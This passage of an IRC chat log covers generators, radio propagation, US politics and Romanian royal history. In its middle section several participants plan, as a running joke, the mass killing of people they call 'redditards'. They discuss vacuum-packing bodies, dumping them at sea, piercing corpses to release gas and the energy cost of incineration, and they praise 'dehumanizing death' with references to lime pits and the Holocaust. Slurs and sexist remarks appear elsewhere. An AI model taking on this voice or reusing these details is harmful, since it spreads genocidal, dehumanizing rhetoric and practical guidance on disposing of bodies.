welders et al would buy. 1733840;1510097461;mircea_popescu;i guess. though im not sure i want to perma-carry the generator coils. 1733841;1510097470;asciilifeform;not so heavy. 1733842;1510097486;asciilifeform;but theoretically even this, could be made detachable. 1733843;1510097501;mircea_popescu;i'd like a car like that, insteadof the "planet saving" bullshit. 1733844;1510097506;asciilifeform;metoo 1733845;1510097520;asciilifeform;would go handily with the 13337 pirate sw set. 1733846;1510097530;mircea_popescu;or with everything else. 1733847;1510097563;mircea_popescu;charge tesla by running mercedes so the hipsters can hipster 1733848;1510097599;asciilifeform;other thing re 'hybrids' that asciilifeform never understood, is why to have a rotary engine at all ! 1733849;1510097607;asciilifeform;can just as easily have linear coils on pistons 1733850;1510097613;mircea_popescu;have 20 meter high inflatable jumpything in middle of nowhere 1733851;1510097614;mircea_popescu;etc 1733852;1510097614;asciilifeform;why suffer the loss on the crankshaft. 1733853;1510097657;asciilifeform;mircea_popescu: they had one of those at 'banat fair' thing ! ( though it was plugged into mains ) 1733854;1510097700;mircea_popescu;myeah. 1733855;1510097811;mircea_popescu;http://btcbase.org/log/2017-11-07#1733522 << had, in ag. and yes it was readily roadable, took basically a semi tractor head to move. 1733856;1510097811;a111;Logged on 2017-11-07 19:00 asciilifeform: ( iirc mircea_popescu has a 800kW diesel ) 1733857;1510097842;asciilifeform;they come in standard railroad size too 1733858;1510097851;asciilifeform;( afaik same item, just diff carriages ) 1733859;1510097856;mircea_popescu;exactly, goes in rr box 1733860;1510098054;mircea_popescu;http://btcbase.org/log/2017-11-07#1733527 << very this much. 1733861;1510098054;a111;Logged on 2017-11-07 19:02 apeloyee: to a reasonable value, but there's probably no escape from "keep moving" 1733862;1510098252;mircea_popescu;http://btcbase.org/log/2017-11-07#1733558 << this is a maintenance nightmare. the fundamental reason girls get married off is that it's much more efficient to maintain a station that works rather than to maintain a station that doesn't work. 1733863;1510098252;a111;Logged on 2017-11-07 19:15 asciilifeform: well yes, in the sense that they spend the vast majority of time, silent 1733864;1510098282;asciilifeform;wasn't meant to be 'kept in attics gathering dust', but simply low duty cycle - as in, e.g., 1ms per hour 1733865;1510098295;asciilifeform;and different msec for each unit. 1733866;1510098308;asciilifeform;triangulation nightmare. 1733867;1510098330;mircea_popescu;http://btcbase.org/log/2017-11-07#1733562 << this is a doubtful proposition, as the enemy is basically "idiots", and much like nature having much more energy to burn than you do, idiots are much more affixed to their idiotarian ideology than you will ever be to yours. 1733868;1510098330;a111;Logged on 2017-11-07 19:17 apeloyee: the enemy doesn't realistically have resource to stand next to everyone. see bitcoin: can't make rewriting history impossible, lets make it unprofitable. 1733869;1510098352;mircea_popescu;they -- for lack of alternative. 1733870;1510098390;asciilifeform;aha, i can easily see usg df iron being mandated in cabletv boxes or similar. 1733871;1510098399;asciilifeform;'help us nail Terrorists' 1733872;1510098435;mircea_popescu;or even silently. 1733873;1510098441;asciilifeform;well naturally silently 1733874;1510098442;mircea_popescu;"this is the new consensus-community developed standard" 1733875;1510098454;asciilifeform;how often do they mandate something loudly and with fanfare. 1733876;1510098476;asciilifeform;fwiw there is already a wifi set in ~every isp-issued kit in usa. which is basically a sdr 1733877;1510098565;asciilifeform;good many cellphones ship with 'digital tv' chipset which is exactly sdr 1733878;1510098578;asciilifeform;( the 'rtl' dongle sdr aficionados ~all use, started life as 'tv' ) 1733879;1510098634;mircea_popescu;http://btcbase.org/log/2017-11-07#1733587 << this is a funny application of the 7 wonders of socialism. dja know that bit ? 1733880;1510098634;a111;Logged on 2017-11-07 19:36 asciilifeform: yet folx keep showing up to work. 1733881;1510098648;asciilifeform;'we pretend to work, they pretend to pay us' ? 1733882;1510098797;mircea_popescu;ledmme fish it out. 1733883;1510098803;*;asciilifeform brb 1733884;1510098922;mircea_popescu;1. full employment ; 2. notwitstanding full employment, no work being done ever observed ; 3. notwithstanding no work being done ever observed, all plans realised > 100% ; 4. notwithstanding all plans always overfulfilled, no useful products ever on the open market ; 5. notwithstanding no products ever on open market, everyone well supplied ; 6. notwithstanding everyone well supplied, everyone always stealing ; 7. notwithstan 1733885;1510098922;mircea_popescu;ding everyone always stealing, nothing ever went missing. 1733886;1510099114;mircea_popescu;http://btcbase.org/log/2017-11-07#1733636 << there's exactly zero incentive to plan for actual war for the obvious reason : 0 survival rate of current socialisms in case of war. 1733887;1510099114;a111;Logged on 2017-11-07 20:05 asciilifeform: ( which will last maybe 40 min. when actual war, but nobody seems to give a shit. ) 1733888;1510099156;mircea_popescu;http://btcbase.org/log/2017-11-07#1733643 << almost! 1733889;1510099156;a111;Logged on 2017-11-07 20:09 asciilifeform: a budget-model pyongyang, could say. 1733890;1510099304;mircea_popescu;http://btcbase.org/log/2017-11-07#1733659 << why not ? cheap solution, passive array, measure em interference. 1733891;1510099304;a111;Logged on 2017-11-07 20:22 asciilifeform: as for atmospheric conditions, station has no way of knowing them 1733892;1510099409;mircea_popescu;http://btcbase.org/log/2017-11-07#1733673 << might lead the british "nuclear submarine"/crock of shit to discover it couldn't actually launch even if it wanted to. 1733893;1510099409;a111;Logged on 2017-11-07 20:29 asciilifeform: ( i wouldn't put it past'em to 'technical glitch' and turn off bbc for a few min. to get you to up your wattage, say ) 1733894;1510099418;mircea_popescu;or did they give up on the pretense meanwhile 1733895;1510099508;mircea_popescu;http://btcbase.org/log/2017-11-07#1733697 << to begin with, they're calling a few hundred people "a manifestation". ro press entirely divorced with any sort of recognizable reality for many years now. 1733896;1510099508;a111;Logged on 2017-11-07 21:37 shinohai: https://www.antena3.ro/actualitate/social/o-organizatie-anarhista-prezenta-la-protestele-de-duminica-441087.html <<< Is my Romanian really that terrible, or are they calling a meme an "anarchist organization" ? 1733897;1510099687;asciilifeform;http://btcbase.org/log/2017-11-08#1733890 << somewhat counter-intuitively, best conditions are the times with ~most~ interference ( i.e. ionosphere propagation most favourable, so you get the rubbish from 10000km away ) 1733898;1510099687;a111;Logged on 2017-11-08 00:01 mircea_popescu: http://btcbase.org/log/2017-11-07#1733659 << why not ? cheap solution, passive array, measure em interference. 1733899;1510099731;mircea_popescu;ok, still measurable. have a km of cable coiled in between plastic foils, buried superficially, there's your mega array. 1733900;1510099738;asciilifeform;it is however moar complicated, there are mechanics of day/night ( various layers, which reflect different bands , appear and disappear with the daylight ) and season. 1733901;1510099739;mircea_popescu;basically a sort of DDR stick on the ground. 1733902;1510099762;asciilifeform;buried cable dun receive much. 1733903;1510099768;asciilifeform;( ground conducts ) 1733904;1510099775;mircea_popescu;superficially, an inch or so 1733905;1510099795;mircea_popescu;acts as a cheap filter. 1733906;1510099797;asciilifeform;try it with ordinary shortwave. dun pick up ~0. 1733907;1510099813;mircea_popescu;you're just trying to answer basic q "sunspot y/n mega storm y/n" 1733908;1510099835;asciilifeform;biggest q is 'where is the daylight in the path' 1733909;1510099848;mircea_popescu;will also answer this. 1733910;1510099873;asciilifeform;on top of this station can see whether it gets answered or not. 1733911;1510099884;mircea_popescu;nah. 1733912;1510099887;asciilifeform;( supposing 2way item ) 1733913;1510099935;asciilifeform;at any rate, i conjecture that if you smear the signal over entire sw band, day/night dun matter so much. 1733914;1510099947;asciilifeform;with sufficient lube^Hy code 1733915;1510100072;asciilifeform;so imho it isn't necessarily the case that your station even has to give a shit re atmosphere. 1733916;1510100151;asciilifeform;( model it, say, as an ensemble of '9000' stations, where if any half dozen of which successfully read other end, you have a link ) 1733917;1510100157;asciilifeform;*reach 1733918;1510100222;asciilifeform;('ultrawideband' people demoed some quite impressive items, e.g. a 500 picowatt thing that was picked up 200km away, etc ) 1733919;1510103177;BingoBoingo;In other noise from the orclands, ACLU and Taylor Swift are now fighting over pop music lyrics. In the evaluating who has more lawyer bucks stage atm. 1733920;1510103790;hanbot;mircea_popescu http://wotpaste.cascadianhacker.com/pastes/ewsqd/?raw=true 1733921;1510103875;hanbot;BingoBoingo what lyrics might those be, 'we shall overcum'? 1733922;1510103885;shinohai;lmfao 1733923;1510104742;asciilifeform;mircea_popescu: i realized one potential headache re http://btcbase.org/log/2017-11-07#1733798 : normally when your merc is grunting out its 160kw, it is ~in motion~ , and air moves through radiator 1733924;1510104742;a111;Logged on 2017-11-07 23:16 mircea_popescu: and most of the weight of the 30kg generator that needs a fuckming crane to move comfortably is the fucking engine, which guess what, i already have. 1733925;1510104779;mircea_popescu;has fan. also, with the modern items... oil temp sits put at optimal throughout. well overcooled. 1733926;1510104793;asciilifeform;fan is good for parking lot 1733927;1510104804;asciilifeform;on jacks, betcha will boil radiator. 1733928;1510104822;mircea_popescu;coolant is over boiling point as it is. pressurized systems. 1733929;1510104837;asciilifeform;stationary gens have quite large radiator. 1733930;1510104844;mircea_popescu;hm. 1733931;1510104919;asciilifeform;nao otoh you don't necessarily need all 160 1733932;1510104942;asciilifeform;so possibly 'parking lot' would suffice. 1733933;1510105088;deedbot;http://trilema.com/2017/cezar-petrescu-file-dintrun-caiet-de-amintiri-mateiu-i-caragiale/ << Trilema - Cezar Petrescu -- File dintr'un caiet de amintiri : Mateiu I. Caragiale 1733934;1510105191;asciilifeform;oh hey hey hey lbj 1733935;1510105212;asciilifeform;the society of rotakus says ty 1733936;1510105387;mircea_popescu;oh! cool. 1733937;1510105399;asciilifeform;mircea_popescu: re 'fram, ursul polar' -- the ancient ЗИЛ-like fridge in 'museum of communist konsoomer' is a 'fram' 1733938;1510105404;mircea_popescu;aha. 1733939;1510105409;mircea_popescu;same root, nansen ship 1733940;1510105410;asciilifeform;coincidence ? 1733941;1510105416;asciilifeform;aa hm. 1733942;1510105429;mircea_popescu;(nansen was a grandiosely misfortunate norwegian that eminently didn't get to the north pole TWICE, nearly died each time) 1733943;1510105443;asciilifeform;i thought it sounded familiar , aha 1733944;1510105444;mircea_popescu;actually managed the 2nd, iirc. 1733945;1510105505;mircea_popescu;(entirely possible the ro commies read the book and never heard of nansen, but anyway) 1733946;1510105540;*;asciilifeform not eaten said b00k yet 1733947;1510106713;asciilifeform;in related lulz, http://oldschgarage.blogspot.com/2014/11/old-fram-fridge-project.html << same fram ! i had no idea that it was an adiabatic cycle thing 1733948;1510106722;asciilifeform;( compressorless ) 1733949;1510107058;mod6;<+mircea_popescu> charge tesla by running mercedes so the hipsters can hipster << lol 1733950;1510109165;asciilifeform;re radio thread, ancient l0gz gold , http://btcbase.org/log/2016-08-18#1524348 1733951;1510109165;a111;Logged on 2016-08-18 13:39 asciilifeform: 'As physicists, radioastronomers, and electronics engineers, we were all struck by the possibility of doing independent broadcasts, if nothing else because that was our profession. My colleagues took part in broadcasts in Warsaw and other cities. Rooftop transmitters had low range. And they were easy for the security services to locate. We had to think of something else. Our colleague Andrzej Jeśmanowicz, son of the noted Toruń mat 1733952;1510109454;asciilifeform;( orig item http://idlewords.com/2007/04/balloon_pirate_radio.htm ) 1733953;1510111573;mircea_popescu;asciilifeform it was yea 1733954;1510112198;mod6;oh hey 1733955;1510112235;mod6;Mr. Popescu, Lords, and General Assembly: Today, I'd like to take a moment to observe and congratulate The Most Serene Republic on it's Third Independence Day! 1733956;1510112320;BingoBoingo; BingoBoingo what lyrics might those be, 'we shall overcum'? << Nah shit like "Look what you made me do" and the word "Rise", which apparently blond white folks aren't allowed to use 1733957;1510112741;BingoBoingo; stationary gens have quite large radiator. << That internal resistance is a bitch 1733958;1510113882;BingoBoingo;http://archive.is/QPiRB 1733959;1510113921;BingoBoingo;"Taylor's lyrics in "Look What You Made Me Do" seem to play to the same subtle, quiet white support of a racial hierarchy. Many on the alt-right see the song as part of a "re-awakening," in line with Trump's rise. At one point in the accompanying music video, Taylor lords over an army of models from a podium, akin to what Hitler had in Nazi Germany. The similarities are uncanny and unsettling." 1733960;1510114024;BingoBoingo;And the motivation: ""Taylor's political silence appeared to be a rejection of her peers' support of the inclusive Democrat platform," Herning wrote. "Taylor's silence is not innocent, it is calculated. And if that is not true, she needs to state her beliefs out loud for the world... in America 2017, silence in the face of injustice means support for the oppressor."" 1733961;1510114191;BingoBoingo;With the Harveywood scandal, pantsuit can't afford to not have all the entertainers in line. 1733962;1510114396;ben_vulpes;mod6: huzzah! 1733963;1510115060;mod6;Indeed, Sir. :] 1733964;1510117902;mircea_popescu;hear hear 1733965;1510117956;mircea_popescu;BingoBoingo ahahaha what the fuck, anyone even supports the "inclusive" pantsuit aggenda ? 1733966;1510117999;BingoBoingo;Only the cuntcovers industry does! 1733967;1510118028;mircea_popescu;amusingly, this is oddly reminescent of the whole http://btcbase.org/log/2015-09-02#1259369 1733968;1510118028;a111;Logged on 2015-09-02 00:34 mircea_popescu: (in kbr's case, it's not that they're stupid, it's that they were raped. the classic "we provide indemnity so now you may not not break the law as we tell you to" trick. "key is in your pocket" in legal parlance) 1733969;1510118036;mircea_popescu;"she has only to speak up and agree with us!!11" 1733970;1510118037;mircea_popescu;as fucking if ? 1733971;1510118977;BingoBoingo;Srsly, thankfully she likes making money more than being friends with the rest of the Brittneychain 1733972;1510119091;mircea_popescu;which i expect is by now pretty butthurt out of sheer hunger. 1733973;1510119464;BingoBoingo;Well, benefits of corruption 1733974;1510122483;BingoBoingo;In other lols, NYC just damned themselves to another DeBlasio term 1733975;1510124122;BingoBoingo;!!Up cruciform 1733976;1510124122;deedbot;cruciform voiced for 30 minutes. 1733977;1510124428;BingoBoingo;In Trilema re-readings http://trilema.com/2013/this-country-is-so-weird/ 1733978;1510124602;cruciform;I was reading Paul Sztorc's blog (truthcoin.info), surpised at his level of insight. Made sense once I got to one of many trilema references 1733979;1510125075;BingoBoingo;Well, he's been here before 1733980;1510125096;BingoBoingo;Failed at the "Keep coming back" part 1733981;1510125110;cruciform;yea, couldn't find him in the WoT 1733982;1510125133;BingoBoingo;Well, he failed at knowing to register when it was suggested to him 1733983;1510125735;mircea_popescu;ie http://btcbase.org/log/2015-09-23#1283184 1733984;1510125735;a111;Logged on 2015-09-23 03:26 mircea_popescu: ie Paul Sztorc ? 1733985;1510125954;mircea_popescu;speaking of "uses of virgin oil", http://78.media.tumblr.com/ab51d45a5f1948a77406927b7e2339b9/tumblr_nlzjn9B0L81qega1vo1_1280.jpg 1733986;1510126546;BingoBoingo;Excellent use of the oil 1733987;1510126573;BingoBoingo;One of the great shames is that now, when I plan on leaving th coop, the pretty girls seem to finally be sobering up 1733988;1510138653;shinohai;http://btcbase.org/log/2017-11-08#1733955 <<< Happy Independence Day mod6 y todos! ^.^ 1733989;1510138653;a111;Logged on 2017-11-08 03:37 mod6: Mr. Popescu, Lords, and General Assembly: Today, I'd like to take a moment to observe and congratulate The Most Serene Republic on it's Third Independence Day! 1733990;1510140699;shinohai;http://archive.is/XObYm <<< This Combs guy is hilarious "teh ENCRYPTIONS" 1733991;1510151401;mircea_popescu;http://btcbase.org/log/2017-11-06#1733223 << incidentally it occurs to me shinohai 's link is the definitive solution to the concentration camp problem. vacupacking the entire us population would probably cost < 1bn in materials. 1733992;1510151401;a111;Logged on 2017-11-06 16:55 shinohai: http://btcbase.org/log/2017-11-06#1733204 Got you a native packed and ready to go: http://btcinfo.sdf.org/uploads/chinagirl.webm 1733993;1510151424;davout;http://btcbase.org/log/2017-11-08#1733955 <<< mazeltov 1733994;1510151424;a111;Logged on 2017-11-08 03:37 mod6: Mr. Popescu, Lords, and General Assembly: Today, I'd like to take a moment to observe and congratulate The Most Serene Republic on it's Third Independence Day! 1733995;1510151444;mircea_popescu;build vacupack units, keep them fed with biomaterial (plastic, schmucks), dump the results at sea. a 100tdw ship should be able to carry 1mn of the shitheads at a time. 1733996;1510151466;mircea_popescu;sea dumping in plastic wrapping ensures they dissolve over time, sort-of like a slow release pill for the ocean. 1733997;1510151471;mircea_popescu;and with that... problem solved. 1733998;1510151479;mircea_popescu;one summer or something. 1733999;1510151570;shinohai;Should I assemble a ship and crew? 1734000;1510151584;mircea_popescu;eh, what's the rush. 1734001;1510151652;shinohai;One could produce the plastic from corn, reducing costs perhaps and ensuring biodegradability. 1734002;1510151707;asciilifeform;they'll outgas, pop 1734003;1510151709;mircea_popescu;yeah. 1734004;1510151712;asciilifeform;needs relief valve. 1734005;1510151725;mircea_popescu;asciilifeform plastic dun pop. hence your coca cola bottle. 1734006;1510151735;asciilifeform;bottle takes 2-3 atm 1734007;1510151744;asciilifeform;bag - prolly not 1734008;1510151759;mircea_popescu;can be made to, certainly. 1734009;1510151766;asciilifeform;( anyone seen old films of elephant carcass rotting in the sun ? eventually explodes, spectacularly ) 1734010;1510151805;asciilifeform;at any rate i have nfi why the bag. brick, chain. feed the fishes. 1734011;1510151815;mircea_popescu;there's more tolerance built into the pack you know, than into the skin 1734012;1510151826;mircea_popescu;asciilifeform you don't want to feed the fishes too much at a time. 1734013;1510151847;shinohai;Would cause a mess of algae! 1734014;1510151849;mircea_popescu;and a coupla kgs of plastic WAY cheaper than 10kg chain + 50kg brick 1734015;1510151871;mircea_popescu;redditard already buried more than his ass is worth in resources. 1734016;1510151918;mircea_popescu;this method allows perfectly dehumanizing death, safe transportation, slow release, it's the proper continuation of lime pit. 1734017;1510151951;mircea_popescu;can even have hello kitty or kek flag or whatever the fuck warhol can paint the dreamers require. 1734018;1510151962;asciilifeform;betcha decomposition in bauxite processor ( bzzzt -- pfff ) costs fewer joules than transport to sea. 1734019;1510151977;mircea_popescu;naaah. transport is cheap. 1734020;1510151992;mircea_popescu;few thousand bux per million. 1734021;1510152021;asciilifeform;did diesel cheapen while i slept 1734022;1510152035;mircea_popescu;nope. 1734023;1510152043;asciilifeform;tho i suppose it depends where in the sea, from where 1734024;1510152059;mircea_popescu;well what, you're not taking them on a fucking cruise. coupla hundred knots offshore. 1734025;1510152073;mircea_popescu;will replenish the cod off cape cod something fantastic, too! 1734026;1510152080;shinohai;As long as producing plastic from corn, perhaps biodiesel also 1734027;1510152085;asciilifeform;carcasses have annoying habit of sailing back to shore 1734028;1510152111;mircea_popescu;asciilifeform not these. see, they only pop in 6 to 36 months when they're well outgassed. 1734029;1510152135;asciilifeform;pop yes , but they float 2-3 wks in 1734030;1510152139;asciilifeform;iirc. 1734031;1510152153;mircea_popescu;this might well be a problem. will require some research. 1734032;1510152172;asciilifeform;i suggest 'trocar' 1734033;1510152178;asciilifeform;( mortician's needle ) 1734034;1510152185;asciilifeform;for outgas valve. 1734035;1510152210;mircea_popescu;might well work yeah. stick in knee automatically at time of packaging. 1734036;1510152218;shinohai;Post on reddit "Free cruise on the S.S. TMSR! For details go to #trilema on freenode!" 1734037;1510152312;shinohai;(Though doesn't have to be Single-Screw steamship) 1734038;1510152315;asciilifeform;it goes in the gut, where most of the gas generation. 1734039;1510152355;mircea_popescu;normally. but this is exceptional time. 1734040;1510152358;BingoBoingo;Now is floating bag *really* a problem? Or a warning 1734041;1510152363;BingoBoingo;Hay mas futuro! 1734042;1510152376;mircea_popescu;BingoBoingo moar like a sign of victory. 1734043;1510152388;mircea_popescu;"i wouldn't live on a place where reddit bags aren't visible from shore" 1734044;1510152398;asciilifeform;BingoBoingo: if they simply float back, not much point in the boat, eh. may as well then stack'em as pyramid, like chingis khan 1734045;1510152402;mircea_popescu;end up on people's arms and shit. 1734046;1510152420;mircea_popescu;"my great-grandfather was clipper on a redditard disposition ship, beotch!!11" 1734047;1510152428;shinohai;lol 1734048;1510152448;BingoBoingo;Anyways, to make up for outgassing without floating, you'd just have to sink the bags deeper... if you really wanted to 1734049;1510152470;mircea_popescu;anyway. let it be plainly stated that current idiot's expectation they'll be shot is about as ridiculous as 1940s jews'. who the fuck can be bothered. 1734050;1510152501;mircea_popescu;BingoBoingo depth just increases buoyancy. 1734051;1510152531;asciilifeform;precedent -- french did not even bother with bags 1734052;1510152536;mircea_popescu;yes, depth pressure will keep the plastic from popping ; but not from floating. 1734053;1510152547;BingoBoingo;Ah 1734054;1510152548;mircea_popescu;asciilifeform it's an ecological consideration. cheaper than burning etc. 1734055;1510152571;asciilifeform;speaking of them barges 1734056;1510152709;asciilifeform;!#s noyade 1734057;1510152709;a111;2 results for "noyade", http://btcbase.org/log-search?q=noyade 1734058;1510152727;shinohai;iirc Muslims prescribed lashing body buried at sea between two wooden planks, so that it might float ashore and be buried by fellow Muslim facing Mecca. 1734059;1510152728;mircea_popescu;the killing itself is a minor part of the problem. coupla cents budgeted at most. 1734060;1510152740;mircea_popescu;the majority of the expense goes to making the corpse "Safe", sterilizing it. 1734061;1510152751;mircea_popescu;something the "planning experts" germans never throught of. 1734062;1510152777;mircea_popescu;the problem with a dead idiot is that it converts upon dying from a large piece of excrement into a large piece of actual excrement. 1734063;1510152845;asciilifeform;biodiesel is promising imho field. 1734064;1510152858;BingoBoingo;Hey, people just want to be shitty 1734065;1510152861;mircea_popescu;maybe ; though all the bones and shit.... 1734066;1510152895;mircea_popescu;biodisel would be winner if we were intelligent celenterates or gasteropodes. for mammals not so hot. 1734067;1510152958;asciilifeform;grind bones for fertilizer. iirc there was a thread. 1734068;1510152973;mircea_popescu;calcium not so much of a fertilizer. 1734069;1510152984;mircea_popescu;back in ro i used ash fertilizer, it was de-boned prior to packing. 1734070;1510153172;asciilifeform;the bauxite thing begins to look like a winner imho 1734071;1510153185;mircea_popescu;nah. the burning's resource-expensive. 1734072;1510153188;asciilifeform;( you still gotta dump the ash somewhere tho ) 1734073;1510153189;BingoBoingo;Yeah, bone meal's this thing used sparingly for tomatoes to prevent blossom end rot. Specialty stuff for picky plants. Otherwise it's just more salt. 1734074;1510153221;mircea_popescu;the correct move is to take the dreamers from the section of earth inhabited (land) to the section of land uninhabited (sea) with a minimum of dirt and contamination produced. 1734075;1510153221;asciilifeform;and naturally you do it somewhere with cheap mains current ( the bauxiteries are helpfully situated there already ) 1734076;1510153241;mircea_popescu;there is no such thing as "cheap mains current". it's expensive universally. 1734077;1510153278;asciilifeform;cheap relatively to fueling the boat. 1734078;1510153315;mircea_popescu;dude... 1734079;1510153325;asciilifeform;and imho there's no particular reason there could not be 'market economy' in redditor disposal. 1734080;1510153330;asciilifeform;'we do it cheaper!' 1734081;1510153346;asciilifeform;'we do first 1,000 phree' 1734082;1510153425;mircea_popescu;asciilifeform understand, the per-kg energetic cost of incineration is > 1MJ. this means 100 tons cost you over 100 GJ, or in fuel terms about a ton of gasoline. you can't be spending 1% by mass ffs. 1734083;1510153440;asciilifeform;was speaking of arc furnace. 1734084;1510153447;asciilifeform;dun think it costs anything like MJ. 1734085;1510153481;mircea_popescu;because why, thermodynamics is your friend and suddenly corpse isn't ~= water soaked aerogel ? 1734086;1510153552;asciilifeform;!~calc 2260 * 50 1734087;1510153554;jhvh1;asciilifeform: 2260 * 50 = 113000 1734088;1510153563;asciilifeform;kJ for 50kg patient 1734089;1510153576;asciilifeform;so mircea_popescu has it 1734090;1510153576;mircea_popescu;ahahaha what. 1734091;1510153592;mircea_popescu;meanwhile! container ship burns ~200 tons per day doing 25 knots. this means it covers 200 knots (go and return) out of 150 tons or so. 1734092;1510153596;asciilifeform;heat of vapourization of kg of water 1734093;1510153613;mircea_popescu;asciilifeform did you omit adding the heat to WARM water to vaporization ? 1734094;1510153626;mircea_popescu;!~calc 4360 * 80 * 50 1734095;1510153627;jhvh1;mircea_popescu: 4360 * 80 * 50 = 17440000 1734096;1510153635;mircea_popescu;forgot this larger lobe right here. 1734097;1510153649;asciilifeform;what's the 80 ? 1734098;1510153672;mircea_popescu;i guess 63.4 would be more accurate. 1734099;1510153677;mircea_popescu;gotta take them from room temp to boiling. 1734100;1510153723;asciilifeform;speaking of dessication, why not sahara dump ? 1734101;1510153732;asciilifeform;as good as sea, neh 1734102;1510153746;mircea_popescu;conceivable, yes. but much more distant. gotta load and then unload, move on land, meh. 1734103;1510153757;mircea_popescu;ocean is conveniently located everywhere. 1734104;1510153760;asciilifeform;tru 1734105;1510153778;davout;http://btcbase.org/log/2017-11-08#1734050 <<< opposite actually 1734106;1510153778;a111;Logged on 2017-11-08 14:48 mircea_popescu: BingoBoingo depth just increases buoyancy. 1734107;1510153807;mircea_popescu;the deeper a mol of gas is, the greater the buoyant force experienced by the flexible container holding it. 1734108;1510153811;asciilifeform;depends on whether compressible object, neh 1734109;1510153814;mircea_popescu;not linearly, but yes. 1734110;1510153835;mircea_popescu;the reason deep things seem to raise "slowly" is because friction, which increases faster than the buoyancy force does. 1734111;1510153843;davout;the gas gets compressed, therefore moves less water, therefore less buoyant 1734112;1510153857;mircea_popescu;yes, but do teh math! doesn't get compressed ~enough~. 1734113;1510153873;mircea_popescu;gets somewhat compressed. 1734114;1510153890;davout;1L of air gets to .5L at 10m depth, experiences mucho less force pushing it up 1734115;1510153904;asciilifeform;still net up. 1734116;1510153911;davout;yeah, obviously 1734117;1510153914;mircea_popescu;davout it's a log. you are looking at the wrong side of this. 1734118;1510153922;mircea_popescu;from 5km to 10km, loses 13% of volume, gains 2x force. 1734119;1510153924;davout;but upward force decreases as depth increases 1734120;1510153931;davout;its not linear obviously 1734121;1510153936;mircea_popescu;but that is the important part. 1734122;1510153959;davout;which is why most baro-traumatisms occur between 10m-0m when scuba diving 1734123;1510153964;mircea_popescu;right. 1734124;1510153972;mircea_popescu;but we're not shallow burrying idiots here 1734125;1510154023;davout;yeah, just saying "depth increases buoyancy" is not correct 1734126;1510154032;mircea_popescu;it is within the context it was used!!!11 1734127;1510154050;mircea_popescu;http://btcbase.org/log/2017-11-08#1734048 << deeper, as in deeper. 1734128;1510154050;a111;Logged on 2017-11-08 14:47 BingoBoingo: Anyways, to make up for outgassing without floating, you'd just have to sink the bags deeper... if you really wanted to 1734129;1510154070;davout;yeah, marginal gains of depth do decrease 1734130;1510154158;davout;naive question, but why no burning? 1734131;1510154239;davout;wouldn't it self-sustain after a while? 1734132;1510154244;mircea_popescu;nah. 1734133;1510154247;mircea_popescu;to do the math properly : 1734134;1510154265;mircea_popescu;!~calc 4360 * 63.4 + 2260 1734135;1510154266;jhvh1;mircea_popescu: 4360 * 63.4 + 2260 = 278684 1734136;1510154292;mircea_popescu;the cost of ~mere vaporization~ of the ~mere water~ in the "water soaked aerogel" composing a shithead is ~280kJ PER KILOGRAM. 1734137;1510154340;mircea_popescu;this disregards any losses due to the aerogel part, which insulates, and also any further losses from "boiling is not enough", as well as passive loss of heat into your apparatus etc. 1734138;1510154374;mircea_popescu;thereby a lowball estimate of "heat to dispose of one" is probably in excess of 30MJ per capita, as opposed to the 1MJ originally estimated above. 1734139;1510154425;davout;and how much energy does the burning generate once water is gone? 1734140;1510154445;mircea_popescu;at the outer margin half a mj ? 1734141;1510154474;mircea_popescu;there;s a reason all bodies rot and no bodies catch fire. 1734142;1510154730;mircea_popescu;cheap way to evaluate this is dietary calories (the conversion is based on ... heat capacity of water again). so basically 1 calorie is 4.2j and the caloric value of untrimmed carcass MAYBE 1 cal/gram. thereby... 100kgs = 420kj. 1734143;1510154773;mircea_popescu;(protein is ~4, sweets ~7, alcohol~9... so if you take a serious alcohol-only meal prior maybe reach the .5mj) 1734144;1510154924;asciilifeform;btw somewhere in the l0gz are the crematory manuals i linked few yrs back 1734145;1510154928;asciilifeform;they have detailed discussion 1734146;1510154955;asciilifeform;( in particular re the effect of fat ) 1734147;1510154995;asciilifeform;redditus may in fact be suitable for self-sustaining fire in a way ww2 folx were not. 1734148;1510155068;asciilifeform;ancient persia had an answer for the 'aerogel insulates' problem. they stuck wicks, of a sort, in the patient, and lit'em 1734149;1510155810;mircea_popescu;dirty and slow. 1734150;1510155844;*;mircea_popescu notices he had protein and sweets switched around. aaanyways 1734151;1510155910;mircea_popescu;!!pay diana_coman .75 1734152;1510155917;deedbot;Get your OTP: http://p.bvulpes.com/pastes/67L86/?raw=true 1734153;1510157118;asciilifeform;in other lulz, amazon co nao offering... i shit thee not, 'Not at home? Not a problem. As a Prime member, you can get packages securely delivered into your home without being there. Plus, grant access to the people you trust, like your family, friends, dog walker, or house cleaner—no more leaving a key under the mat.' << 'cloud'-controlled door lock. 1734154;1510157301;mircea_popescu;heh. 1734155;1510157328;mircea_popescu;asciilifeform recall when post-war commies did the whole "you gotta take so and so people into "your" house because it's ours and we house people there" ? what gnashing of teeth, what anger it caused ? 1734156;1510157341;mircea_popescu;apparently all they had to do is call it "prime" 1734157;1510157389;asciilifeform;i suppose the breaking-doors thing was deemed arduous, traumatic, costly 1734158;1510157399;asciilifeform;better to train the cattle to open on own power. 1734159;1510157406;mircea_popescu;as per above discussion lol. 1734160;1510157431;asciilifeform;and what post-war 1734161;1510157440;asciilifeform;communal flats were a thing in su from 20s up 1734162;1510157464;asciilifeform;i even got to live in the (tail end) of one. 1734163;1510157477;mircea_popescu;well, i was talking about european countries. 1734164;1510157483;mircea_popescu;the "liberated" 1734165;1510157527;asciilifeform;well su naturally didn't happen in ro until post ww2 yea 1734166;1510157567;asciilifeform;incidentally asciilifeform is currently puzzled re what exactly happened in '45-'47 in ro 1734167;1510157570;asciilifeform;under king mihai 1734168;1510157586;asciilifeform;( who, incidentally, last i heard was alive still ) 1734169;1510157648;mircea_popescu;sure he is. 1734170;1510157660;mircea_popescu;well, what, shall i produce an ad hoc history lesson ? 1734171;1510157670;asciilifeform;link worx too 1734172;1510157683;mircea_popescu;you really think there exista another romanian scholar ? 1734173;1510157686;mircea_popescu;anyway, lessee 1734174;1510157802;mircea_popescu;romania had a great king, carol 1st. he was a scion of carol of hohenzollern and maria murat. romania also had three shitty kings : ferdinand, carol 2 and mihai, in decreasing order of shittytude -- the first one was like a librarian, inept but disciplined. these come off leopold and some portuguese infanta. MUCH worse material. 1734175;1510157820;mircea_popescu;the switch happened because the original carol didn't have children. which happened because "marriage", dumbest fucking shit ever. but we digress. 1734176;1510157870;mircea_popescu;the 2nd carol was very much a redditard. he quit to pursue his whoring interests, leaving the congenitally retarded mihai "on the throne". this is through and through power vacuum. eventually he returned, and tried to be a sort of local mussolini, tho it didn't so much catch. 1734177;1510157903;mircea_popescu;romania got meanwhile engaged on the eastern front by general antonescu, who was literally as he describes himself, a military man being 